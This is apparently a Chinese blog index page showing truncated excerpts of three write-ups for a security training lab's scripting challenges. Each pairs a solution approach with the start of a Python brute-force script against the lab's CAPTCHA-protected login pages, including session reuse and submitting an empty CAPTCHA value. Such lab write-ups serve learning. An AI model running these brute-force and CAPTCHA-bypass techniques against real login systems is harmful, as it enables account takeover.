文章 35
评论 44
浏览 71000
网络安全实验室(脚本区 基情燃烧的岁月)

网络安全实验室(脚本区 基情燃烧的岁月)

思路:暴力破解3位纯数字的验证码 坑:在破解前,需要用脚本模拟点击获取验证码的链接,正如实际情况那样,服务器要先发送验证码,你才能开始输入验证码,否则服务器怎么知道你这验证码是不是正确的呢? #coding=utf-8 from http import cookies import requests; from lxml import etree #解析html页面的包 import threading curtask = 100 maxtask = 999 flag = False lock = threading.Lock() url = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901" s = requests.session() r1 = s.get(url) url3 = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/vcode.php" r = s.post(url=url3,data={ ....

网络安全实验室(脚本区 逗比验证码第二期)

网络安全实验室(脚本区 逗比验证码第二期)

很无语的解题思路:验证码使用一次后就会失效,这句话意思是不需要使用验证码也可以,即验证码为空串。所以表单中vcode="" 更快的暴力方法是用多线程 代码参考https://www.freesion.com/article/53961309685/ import requests, threading url = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php' login = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php' header = {'Referer': 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1'} s = requests.session....

网络安全实验室(脚本区 逗比验证码第一期)

网络安全实验室(脚本区 逗比验证码第一期)

解决本题的关键是维护同一个账号的会话(session),这样验证码就可以确定下来。 先获取到验证码的地址(在r1.text中),手动输入验证码vode,再进行密码爆破 #coding=utf-8 from http import cookies import requests; from lxml import etree #解析html页面的包 if __name__ == "__main__": url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php" s = requests.session() r1 = s.get(url) print(r1.text) vcode = input() url2 = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php" for i in range(1000, 10000): res = s.post(url = url2, data={ 'u....

Life Is Like A Boat